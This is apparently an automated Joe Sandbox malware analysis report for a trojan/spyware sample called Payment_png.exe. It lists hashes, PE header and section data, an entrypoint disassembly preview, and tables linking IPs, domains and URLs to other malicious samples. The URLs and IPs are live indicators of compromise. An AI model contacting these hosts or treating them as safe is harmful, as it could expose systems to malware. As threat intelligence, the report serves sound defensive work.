                                                        13335CLOUDFLARENETUStrue

                                                        General Information

                                                        Joe Sandbox Version:31.0.0 Emerald
                                                        Analysis ID:377352
                                                        Start date:29.03.2021
                                                        Start time:13:57:10
                                                        Joe Sandbox Product:CloudBasic
                                                        Overall analysis duration:0h 8m 19s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:light
                                                        Sample file name:Payment_png.exe
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                        Number of analysed new started processes analysed:24
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:1
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • HDC enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.evad.winEXE@7/0@13/7
                                                        EGA Information:Failed
                                                        HDC Information:
                                                        • Successful, ratio: 50.2% (good quality ratio 43.6%)
                                                        • Quality average: 71.5%
                                                        • Quality standard deviation: 33.4%
                                                        HCA Information:
                                                        • Successful, ratio: 67%
                                                        • Number of executed functions: 0
                                                        • Number of non-executed functions: 0
                                                        Cookbook Comments:
                                                        • Adjust boot time
                                                        • Enable AMSI
                                                        • Found application associated with file extension: .exe
                                                        Warnings:
                                                        Show All
                                                        • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
                                                        • TCP Packets have been reduced to 100
                                                        • Excluded IPs from analysis (whitelisted): 52.147.198.201, 168.61.161.212, 40.88.32.150, 104.43.139.144, 184.30.20.56, 20.50.102.62, 13.88.21.125, 2.20.142.210, 2.20.142.209, 20.190.160.129, 20.190.160.71, 20.190.160.134, 20.190.160.6, 20.190.160.69, 20.190.160.4, 20.190.160.132, 20.190.160.73, 93.184.220.29, 92.122.213.194, 92.122.213.247, 172.67.184.37, 104.21.51.189, 20.54.26.129
                                                        • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, cs9.wac.phicdn.net, www.tm.lg.prod.aadmsa.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, www.tm.a.prd.aadg.trafficmanager.net, www.booksfall.com.cdn.cloudflare.net, skypedataprdcoleus15.cloudapp.net, ocsp.digicert.com, login.live.com, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, fs.microsoft.com, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, login.msa.msidentity.com, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, ams2.current.a.prd.aadg.trafficmanager.net
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                                        Simulations

                                                        Behavior and APIs

                                                        No simulations

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                        198.54.117.2189tRIEZUd1j.exeGet hashmaliciousBrowse
                                                        • www.thesixteenthround.net/aqu2/?5j=s0A+R2zrZH16LfLMe9M/AmUzyN8aP2GBLvlZkca4zy1idqDqw+DRrqUwOXi4yQd3lVO7&_P=2dhtaH9
                                                        Gt8AN6GiOD.exeGet hashmaliciousBrowse
                                                        • www.boogerstv.com/p2io/?n8Ehjz3=fW2NkW2j278wyrs6d/m+egXTc5dWq8qtohQAL+tQrXSmfdetyJ3HBVVg7gxxicKRFJwM&JtxH=XPs0s4JPf
                                                        27hKPHrVa3.exeGet hashmaliciousBrowse
                                                        • www.boogerstv.com/p2io/?RR=YrKhZvg&rp=fW2NkW2j278wyrs6d/m+egXTc5dWq8qtohQAL+tQrXSmfdetyJ3HBVVg7gxxicKRFJwM
                                                        Payment 9.10000 USD.exeGet hashmaliciousBrowse
                                                        • www.mondopeak.com/m8es/?dL3pv=B53Wf6M3JDAEan34e2a23JkFEJLcYp8ycOdfYrTy6dbNslo5+k2oC0PjjJDWZV/24+RN&BlL=8pdpXZ1po
                                                        Fully Executed Contract.xlsxGet hashmaliciousBrowse
                                                        • www.successandjoy.club/3ueg/?cFN=ErmXmMBIFtdewFC6O29iVXifVtX5lbM9ZC7kz+NOoNf32Keeuvv655T9v66BJ70e0flOVQ==&PBU=dpg8g
                                                        Inv.exeGet hashmaliciousBrowse
                                                        • www.a-zsolutionsllc.com/hko6/?NVxxVPJ=eHiVknBCI+BDKnmhqMCE00F5l7UznldHUBBF08pOLsPmMyvxBhFlr4jwGXOfKoyPZ21p&Ch6LF=9rj0axC
                                                        IMG_7742_Scanned.docGet hashmaliciousBrowse
                                                        • www.washabsorber.com/gypo/?UrjPuprX=Pn910w3l5D7RPWGrIfEjN0rd6RS+9oh5xbf6ZpHI5T1fuoOy87qGtS6g2RMAOlxWqznzEw==&nnLx=UBZp3XKPefjxdB
                                                        zMJhFzFNAz.exeGet hashmaliciousBrowse
                                                        • www.mediasupernova.com/idir/?zZ0lQ0=BBXoJm4OTOHApCp3fGSy0sEyLibn+67cOqzoDset7FTIXfnJGeAyh+7pO3MSwT6mb2mV&Wzr=H2MDx8O8kJn8f
                                                        InterTech_Inquiry.exeGet hashmaliciousBrowse
                                                        • www.chelseybalassi.com/pkfa/?UjRXl6T=540ZEXgghc6Opj/C8VvmRqfXW77/Y/lS6uCB1iFiIAmIxFNNfvvrJybl+KB5y+kqtClQ&tVEp=1b60ITOxXh8hrzep
                                                        00278943.xlsxGet hashmaliciousBrowse
                                                        • www.coffreauxtissus.com/tmz/?Xrx4qhO=p1AOeEel+iKfzrJrX3ku4fFInusX5uqiRYnKoS72OyvSgvmqycsVhhJV/aISDmeQLKXuHQ==&dny8V=8p-t_j0XJnOLab
                                                        insz.exeGet hashmaliciousBrowse
                                                        • www.a-zsolutionsllc.com/hko6/?sDHh4=eHiVknBCI+BDKnmhqMCE00F5l7UznldHUBBF08pOLsPmMyvxBhFlr4jwGXO1VYCPd09p&Wr=M4nHMf1xX
                                                        Invoice Payment Details.exeGet hashmaliciousBrowse
                                                        • www.angermgmtathome.com/kio8/?PR-Hfnn=e6NOpdhu6GIIdtRIIRGR8dBI9mtGur58S+UqNMdGsY3OVbM2U6HgcHgaHzLrSTP9HxKs&Cd8t=9rJx809H6RL0Cr7
                                                        order.exeGet hashmaliciousBrowse
                                                        • www.a-zsolutionsllc.com/hko6/?X2Mt66Xx=eHiVknBCI+BDKnmhqMCE00F5l7UznldHUBBF08pOLsPmMyvxBhFlr4jwGUiPWZu0eDc4L90DGg==&bly=TVThefOpdDy0
                                                        Z4bamJ91oo.exeGet hashmaliciousBrowse
                                                        • www.swavhca.com/jskg/?inKP_TF0=d8LPYq+5Arayfm1vXo3Q9MeTj0bruQyaWpvdMQHKTdQ1FO0+Z34o/nFcLAzU62aITRdq&oneha=xPMpsZU8
                                                        zISJXAAewo.exeGet hashmaliciousBrowse
                                                        • www.pnorg.net/jskg/?X2JtLRIH=FFllKUI2Vy3AcuNhWrh4fKbis3luBqLkf2wubdQ4CJ+GPQXPDvWWudAI4bM3GwbQsdH4&blv=UVIpcz0pIRTp
                                                        DOC051220-007_pdf.exeGet hashmaliciousBrowse
                                                        • www.linuxquebec.net/p2he/?kjupuX=YCJF0hDOwvNF02nErBuudkBrc+0Duum5woBHTwBsJZjMMfGnyLSeEFqCGfSIlJK3ltC5&tX=AbmdQl5h9JnT7riP
                                                        SKY POUNDS.exeGet hashmaliciousBrowse
                                                        • www.allinlifestyle.club/bu43/?Ln68=FZOp3Nc8Op&KN6xW=U8sju60F1wt8yC9fXbPA8MZngBn2sAHjb+toaJCKe7zgWDnf8Ko5UEAuCgCMNpS+8k6T
                                                        MxL5EoQS5q.exeGet hashmaliciousBrowse
                                                        • www.varonaoptical.com/o56q/?-Z2hnx=+6KqlXCT/pA/oDqwzrRUswgKWTyt1bmDlyjOl0MkZgd+CYHeb4TWrlrLvZ2g9591lyoA&2d=lneha
                                                        sSPA66WeL6.exeGet hashmaliciousBrowse
                                                        • www.meditationdr.online/oj6t/?rv=lzuTRLxPWP_0Uf9&LJBpmDl=ooax6d9kW3xUtcAOZ5L/p9Ae6ZKMqd6/GEBhgmabm6VUFi57wzZvxwkikckifavWrnRM
                                                        SOA290114.exeGet hashmaliciousBrowse
                                                        • www.teamchi.club/t4vo/?pRoHnPa=Npnlt5ZtO906n53msd9G5pBOdHOEeXQyD/1EjRFLMV7cbHJomhnAcg5WDTv26ffVHF1nKseX0Q==&uZWD=XPjPaXEPSFMX8Dl
                                                        66.96.160.133Quotation.vbsGet hashmaliciousBrowse
                                                          23.227.38.32PO_210202.exeGet hashmaliciousBrowse
                                                          • www.poshmaternityshop.com/bna/?q48=GbqTYRK82&Rxo=0pdOhhx3vWK7Q7Lm8YoccC71y0bjXEGTOkVjYQN7Ta0GPZfIAty3VohXPAcVFipZuPnz
                                                          RTV900021234.exeGet hashmaliciousBrowse
                                                          • www.recetasnutribullet.com/krc/?LZiH=ypqh5Rq0KFKhz8cp&APX87P=J1z2A29zSmQE+W9Ze7aQ8ddXOAnwBSRPiI4KZINTk+R4zZwk1f7qgz6Qd9wTP0FvZ9Af
                                                          invoice-98726782.docGet hashmaliciousBrowse
                                                          • www.raindanceboutique.com/dhc/?9rbXut=zzr4HpmpzzF&rDHH=btD0mDeym8jPFmNHnNG5PNL07qsXtN0iT1tTTlJQ6/7+XCsQ4Nrtv8l44vI3vGz/+qlndg==
                                                          http://highplainsprospectors.comGet hashmaliciousBrowse
                                                          • highplainsprospectors.com/
                                                          formbook_payload.exeGet hashmaliciousBrowse
                                                          • www.slothzzz.com/agwz/?LZND0=Nm1g+Cr7PxAWjMuG/lXz57InbucQImWyPlJ6lo+2AgUBGhOlnrczzCcW0Z0mOFR6lVtp&MnZ=GXLtz
                                                          Payment Advice-Advice Ref G5008785.exeGet hashmaliciousBrowse
                                                          • www.studiopenelope.com/xwqs/?QZ0=WVDUogDEkjeTkhL47EcHvrDOQUKuFjT9gGueqdK9+OeWDBHmmQ122+i+Yz7OfF3QkzRV&3fvh=hpvTRRlHj2-lYncP
                                                          900821.exeGet hashmaliciousBrowse
                                                          • brilliantk9.com/robots.txt
                                                          65history.486.js.js.jsGet hashmaliciousBrowse
                                                          • alefjudaica.com/h70j1sxj
                                                          http://lightpack.tv/wp-content/PrismatikSetup_6.0.0.exeGet hashmaliciousBrowse
                                                          • lightpack.tv/wp-content/PrismatikSetup_6.0.0.exe
                                                          http://stateandfederalposter.com/Get hashmaliciousBrowse
                                                          • stateandfederalposter.com/
                                                          21Order,docx.exeGet hashmaliciousBrowse
                                                          • www.scrunchie.biz/hx336/?at1h=N3vM61B0qGDaf+c7iTDHeuZBuEcYSiMBRHN3hkh2c/L+ffuwZStILfrM16BWKmlA09s3QjwyjuT2cEM/dLfO&A8D0=AnadWXNhlZdl5P

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          parkingpage.namecheap.comsalescontractv2draft.exeGet hashmaliciousBrowse
                                                          • 198.54.117.210
                                                          rErRI1Ktbf.exeGet hashmaliciousBrowse
                                                          • 198.54.117.210
                                                          9tRIEZUd1j.exeGet hashmaliciousBrowse
                                                          • 198.54.117.218
                                                          Gt8AN6GiOD.exeGet hashmaliciousBrowse
                                                          • 198.54.117.218
                                                          2pA9qt1vU4.exeGet hashmaliciousBrowse
                                                          • 198.54.117.215
                                                          1LHKlbcoW3.exeGet hashmaliciousBrowse
                                                          • 198.54.117.212
                                                          NEW ORDER 3742.exeGet hashmaliciousBrowse
                                                          • 198.54.117.211
                                                          PO# 4510175687.exeGet hashmaliciousBrowse
                                                          • 198.54.117.212
                                                          kAO6QPQsZF.exeGet hashmaliciousBrowse
                                                          • 198.54.117.210
                                                          LrJiu5vv1t.exeGet hashmaliciousBrowse
                                                          • 198.54.117.212
                                                          27hKPHrVa3.exeGet hashmaliciousBrowse
                                                          • 198.54.117.218
                                                          Payment 9.10000 USD.exeGet hashmaliciousBrowse
                                                          • 198.54.117.218
                                                          MACHINE SPECIFICATION.exeGet hashmaliciousBrowse
                                                          • 198.54.117.215
                                                          RFQ00787676545654300RITEC.docGet hashmaliciousBrowse
                                                          • 198.54.117.217
                                                          Fully Executed Contract.xlsxGet hashmaliciousBrowse
                                                          • 198.54.117.218
                                                          2021_03_16.exeGet hashmaliciousBrowse
                                                          • 198.54.117.217
                                                          order samples 056-062 _pdf.exeGet hashmaliciousBrowse
                                                          • 198.54.117.216
                                                          Gv8Zd3cf8H.exeGet hashmaliciousBrowse
                                                          • 198.54.117.212
                                                          yxQWzvifFe.exeGet hashmaliciousBrowse
                                                          • 198.54.117.210
                                                          E2qMfhH57G.exeGet hashmaliciousBrowse
                                                          • 198.54.117.215

                                                          ASN

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          NAMECHEAP-NETUSDHL_document11022020680908911.doc.exeGet hashmaliciousBrowse
                                                          • 198.54.122.60
                                                          SecuriteInfo.com.Trojan.PackedNET.576.11555.exeGet hashmaliciousBrowse
                                                          • 198.54.122.60
                                                          salescontractv2draft.exeGet hashmaliciousBrowse
                                                          • 198.54.117.210
                                                          InYqh5AcS6.exeGet hashmaliciousBrowse
                                                          • 198.54.122.60
                                                          Yvmkw23Is5.exeGet hashmaliciousBrowse
                                                          • 198.54.122.60
                                                          tl7WJoaDUI.exeGet hashmaliciousBrowse
                                                          • 198.54.122.60
                                                          EiSPsgvb9L.exeGet hashmaliciousBrowse
                                                          • 198.54.122.60
                                                          IFC97cyhGG.exeGet hashmaliciousBrowse
                                                          • 198.54.122.60
                                                          rErRI1Ktbf.exeGet hashmaliciousBrowse
                                                          • 198.54.117.210
                                                          nXbr39i8id.exeGet hashmaliciousBrowse
                                                          • 198.54.122.60
                                                          KCPWdXq731.exeGet hashmaliciousBrowse
                                                          • 198.54.122.60
                                                          iDWyvado4K.exeGet hashmaliciousBrowse
                                                          • 198.54.122.60
                                                          fdIR3c9MMf.exeGet hashmaliciousBrowse
                                                          • 198.54.122.60
                                                          50729032021.xlsxGet hashmaliciousBrowse
                                                          • 198.54.117.197
                                                          Drawing Pipe Spools Ducts.docGet hashmaliciousBrowse
                                                          • 198.54.122.60
                                                          OUTSTANDING INVOICE.docGet hashmaliciousBrowse
                                                          • 198.54.122.60
                                                          9tRIEZUd1j.exeGet hashmaliciousBrowse
                                                          • 198.54.117.218
                                                          Gt8AN6GiOD.exeGet hashmaliciousBrowse
                                                          • 198.54.117.197
                                                          ACH25083.htmGet hashmaliciousBrowse
                                                          • 104.219.248.71
                                                          2pA9qt1vU4.exeGet hashmaliciousBrowse
                                                          • 198.54.117.215
                                                          ONEANDONE-ASBrauerstrasse48DErErRI1Ktbf.exeGet hashmaliciousBrowse
                                                          • 217.160.0.41
                                                          TaTYytHaBk.exeGet hashmaliciousBrowse
                                                          • 82.223.14.245
                                                          messg_02620000_deupx - Copy.exeGet hashmaliciousBrowse
                                                          • 217.160.40.194
                                                          2pA9qt1vU4.exeGet hashmaliciousBrowse
                                                          • 213.171.195.105
                                                          aEdlObiYav.exeGet hashmaliciousBrowse
                                                          • 87.106.136.232
                                                          2670890000.exeGet hashmaliciousBrowse
                                                          • 74.208.5.2
                                                          4090850000.exeGet hashmaliciousBrowse
                                                          • 74.208.5.2
                                                          orders.exeGet hashmaliciousBrowse
                                                          • 74.208.236.169
                                                          #0019.vbsGet hashmaliciousBrowse
                                                          • 198.251.72.110
                                                          rona.exeGet hashmaliciousBrowse
                                                          • 217.76.128.34
                                                          New order PO-15547.exeGet hashmaliciousBrowse
                                                          • 217.160.0.241
                                                          RFx 6300306423.docGet hashmaliciousBrowse
                                                          • 217.160.0.41
                                                          Geldtransferbeleg.exeGet hashmaliciousBrowse
                                                          • 212.227.15.158
                                                          SecuriteInfo.com.Mal.Generic-S.29648.exeGet hashmaliciousBrowse
                                                          • 74.208.5.2
                                                          Order 100955-21042021.exeGet hashmaliciousBrowse
                                                          • 74.208.5.15
                                                          R ALHTQ19-P0401-940 GR2P5 TYPBLDG-NASE FERDAN Q0539 NE-Q22.exeGet hashmaliciousBrowse
                                                          • 212.227.17.174
                                                          ORDER 100955-21042021.exeGet hashmaliciousBrowse
                                                          • 74.208.5.15
                                                          Purchase Order 2021 - 00041.exeGet hashmaliciousBrowse
                                                          • 217.160.0.241
                                                          image0694.exeGet hashmaliciousBrowse
                                                          • 213.165.67.118
                                                          h8lD4SWL35.exeGet hashmaliciousBrowse
                                                          • 217.160.0.69
                                                          PRIVATESYSTEMSUSR8WWx5t2RE.dllGet hashmaliciousBrowse
                                                          • 108.160.158.123
                                                          P.O 5282.exeGet hashmaliciousBrowse
                                                          • 170.249.209.250
                                                          documentation (64).xlsGet hashmaliciousBrowse
                                                          • 67.222.24.174
                                                          documentation (64).xlsGet hashmaliciousBrowse
                                                          • 67.222.24.174
                                                          Statement for T10495.jarGet hashmaliciousBrowse
                                                          • 207.7.94.54
                                                          Statement for T10495 - 18-01-21 15-23.jarGet hashmaliciousBrowse
                                                          • 207.7.94.54
                                                          Revise Order.exeGet hashmaliciousBrowse
                                                          • 162.248.50.97
                                                          PO21010699XYJ.exeGet hashmaliciousBrowse
                                                          • 162.248.50.97
                                                          cmtel-pdf.htmlGet hashmaliciousBrowse
                                                          • 204.197.244.149
                                                          cmtel-pdf.htmlGet hashmaliciousBrowse
                                                          • 204.197.244.149
                                                          SecuriteInfo.com.Trojan.PWS.Stealer.29660.11031.exeGet hashmaliciousBrowse
                                                          • 162.211.86.20
                                                          https://oldfordcrewcabs.com/bin/new/s/?signin=d41d8cd98f00b204e9800998ecf8427e&auth=576667a3e7108b979c62abddd4c8f3e39d282c0ee888bd787542afb4ff83df171524e184Get hashmaliciousBrowse
                                                          • 199.167.203.145
                                                          SecuriteInfo.com.Trojan.PackedNET.405.30542.exeGet hashmaliciousBrowse
                                                          • 162.211.86.20
                                                          4ADvH4Xsmh.exeGet hashmaliciousBrowse
                                                          • 162.246.57.153
                                                          https://www.casalfarneto.it/wp-content/siteguarding_logs/www.htmlGet hashmaliciousBrowse
                                                          • 104.193.111.209
                                                          RFQ-1225 BE285-20-B-1-SMcS - Easi-Clip Project.exeGet hashmaliciousBrowse
                                                          • 158.106.136.41
                                                          justificante de la transfer.exeGet hashmaliciousBrowse
                                                          • 162.246.57.153
                                                          wwKE1R7ley.docGet hashmaliciousBrowse
                                                          • 162.255.160.32
                                                          https://bingotips.androidphones.co.ukGet hashmaliciousBrowse
                                                          • 67.222.12.234
                                                          Documentation-906738957.docGet hashmaliciousBrowse
                                                          • 170.249.199.66
                                                          BIZLAND-SDUSsalescontractv2draft.exeGet hashmaliciousBrowse
                                                          • 66.96.162.149
                                                          orders.exeGet hashmaliciousBrowse
                                                          • 65.254.248.81
                                                          Order-PO-0186500.exeGet hashmaliciousBrowse
                                                          • 207.148.248.143
                                                          shippingdoc_pdf.exeGet hashmaliciousBrowse
                                                          • 66.96.162.148
                                                          FYI AWB Shipping documents 7765877546 PDF.exeGet hashmaliciousBrowse
                                                          • 66.96.134.26
                                                          70f0bEUdPO.exeGet hashmaliciousBrowse
                                                          • 66.96.162.148
                                                          PO_210316.exe.exeGet hashmaliciousBrowse
                                                          • 66.96.162.131
                                                          Shipping Doc.exeGet hashmaliciousBrowse
                                                          • 66.96.160.139
                                                          INVOICE-OVERDUE.jpg.exeGet hashmaliciousBrowse
                                                          • 66.96.162.140
                                                          purchase order#034.exeGet hashmaliciousBrowse
                                                          • 66.96.162.149
                                                          xYSbLjGo7S.rtfGet hashmaliciousBrowse
                                                          • 66.96.160.130
                                                          Done.exeGet hashmaliciousBrowse
                                                          • 66.96.162.148
                                                          Scan 392021 pdf.exeGet hashmaliciousBrowse
                                                          • 66.96.160.141
                                                          N6Ej6HEuQt.exeGet hashmaliciousBrowse
                                                          • 66.96.162.133
                                                          REF334.exeGet hashmaliciousBrowse
                                                          • 66.96.131.46
                                                          RAQ11986.exeGet hashmaliciousBrowse
                                                          • 66.96.162.141
                                                          RQP_10378065.exeGet hashmaliciousBrowse
                                                          • 66.96.162.149
                                                          cVMEVF5BE4.xlsGet hashmaliciousBrowse
                                                          • 65.254.248.143
                                                          AgroAG008021921doc_pdf.exeGet hashmaliciousBrowse
                                                          • 66.96.146.102
                                                          IMG_7189012.exeGet hashmaliciousBrowse
                                                          • 66.96.162.149

                                                          JA3 Fingerprints

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          37f463bf4616ecd445d4a1937da06e19Ypp2jYNpAI.exeGet hashmaliciousBrowse
                                                          • 170.249.199.106
                                                          5zc9vbGBo3.exeGet hashmaliciousBrowse
                                                          • 170.249.199.106
                                                          InnAcjnAmG.exeGet hashmaliciousBrowse
                                                          • 170.249.199.106
                                                          VM-(#Ud83d#Udcde)-- 19795.htmGet hashmaliciousBrowse
                                                          • 170.249.199.106
                                                          2019-07-05-password-protected-Word-doc-with-macro-for-follow-up-malware.docmGet hashmaliciousBrowse
                                                          • 170.249.199.106
                                                          DP5kUHHaWs.exeGet hashmaliciousBrowse
                                                          • 170.249.199.106
                                                          Zc0HsqUzyy.exeGet hashmaliciousBrowse
                                                          • 170.249.199.106
                                                          8X93Tzvd7V.exeGet hashmaliciousBrowse
                                                          • 170.249.199.106
                                                          u8A8Qy5S7O.exeGet hashmaliciousBrowse
                                                          • 170.249.199.106
                                                          S8rV8MfxCd.exeGet hashmaliciousBrowse
                                                          • 170.249.199.106
                                                          kHq2ComWy7.exeGet hashmaliciousBrowse
                                                          • 170.249.199.106
                                                          swift-12688.exeGet hashmaliciousBrowse
                                                          • 170.249.199.106
                                                          fKoJx7Ilkj.exeGet hashmaliciousBrowse
                                                          • 170.249.199.106
                                                          SecuriteInfo.com.Mal.GandCrypt-A.5674.exeGet hashmaliciousBrowse
                                                          • 170.249.199.106
                                                          Y55jFKmHpT.exeGet hashmaliciousBrowse
                                                          • 170.249.199.106
                                                          IBKT5GSRU1.exeGet hashmaliciousBrowse
                                                          • 170.249.199.106
                                                          0bcd04549f88ae97a142a6c8c34f46527b88ab15fc1fb.exeGet hashmaliciousBrowse
                                                          • 170.249.199.106
                                                          1k2RZQrqkh.exeGet hashmaliciousBrowse
                                                          • 170.249.199.106
                                                          rwwxCIU6Kk.exeGet hashmaliciousBrowse
                                                          • 170.249.199.106
                                                          fXXC1Q2nRt.exeGet hashmaliciousBrowse
                                                          • 170.249.199.106

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          No created / dropped files found

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):5.377414770988995
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.15%
                                                          • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:Payment_png.exe
                                                          File size:98304
                                                          MD5:86fa26e33879d3c04152301eaaaba518
                                                          SHA1:3c75755b8efe897bb18ea99f6014dabd5492d32c
                                                          SHA256:eacf1b7b8d612e5a500f79a03b06f9fb919768a1fb053ce3522f3288c36067f4
                                                          SHA512:29e5f47bcee495a43b7e97383080f965e18eb7eda93b69fbd06e65fd6b1e47f3b9e898b4574e41818aed4b0014961cdd2741d75a5b34ffd51dbad06c23f44ab5
                                                          SSDEEP:1536:nle5CD3/URwKGIOzE7YUzlDX0UEeQpe5:lBrURwUOzQYk5ZQp
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L.....PW.................@...@......x........P....@................

                                                          File Icon

                                                          Icon Hash:11d0cca988e43480

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x401378
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                          DLL Characteristics:
                                                          Time Stamp:0x5750A3D1 [Thu Jun 2 21:23:29 2016 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:a8b86b6cb5a304f5649372dc4fc7de67

                                                          Entrypoint Preview

                                                          Instruction
                                                          push 00402B68h
                                                          call 00007FEA74E5A533h
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          xor byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          inc eax
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [edi+531D74E3h], al
                                                          mov byte ptr [ebp+4Eh], ch
                                                          scasb
                                                          fistp word ptr [edx-0FD75C92h]
                                                          retf
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add dword ptr [eax], eax
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          arpl word ptr [edx], bx
                                                          add edx, dword ptr [eax+61h]
                                                          insb
                                                          jnc 00007FEA74E5A5BBh
                                                          imul ebp, dword ptr [esi+67h], 00410800h
                                                          and byte ptr [eax], cl
                                                          inc ecx
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add bh, bh
                                                          int3
                                                          xor dword ptr [eax], eax
                                                          or esi, dword ptr [edx+67663E8Bh]
                                                          psadbw mm0, qword ptr [edi-4Eh]
                                                          stosb
                                                          aam DAh
                                                          fld tbyte ptr [edi+ebp*2-38C0617Ch]
                                                          mov ch, 43h
                                                          mov al, byte ptr [B594427Ch]
                                                          adc dword ptr [ebp+0F563441h], 3Ah
                                                          dec edi
                                                          lodsd
                                                          xor ebx, dword ptr [ecx-48EE309Ah]
                                                          or al, 00h
                                                          stosb
                                                          add byte ptr [eax-2Dh], ah
                                                          xchg eax, ebx
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          sbb eax, 65000017h
                                                          adc eax, 0E000000h
                                                          add byte ptr [ebx+75h], dh
                                                          bound esp, dword ptr [ecx+73h]
                                                          jnc 00007FEA74E5A5B1h
                                                          arpl word ptr [ecx+61h], bp
                                                          je 00007FEA74E5A5ABh
                                                          jbe 00007FEA74E5A5A7h
                                                          add byte ptr [66000701h], cl

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x142040x28.text
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x170000x1974.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2280x20
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x10000x128.text
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x10000x137900x14000False0.309924316406data5.74216036023IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                          .data0x150000x11b40x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                          .rsrc0x170000x19740x2000False0.513793945312data4.5489451124IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                          Resources

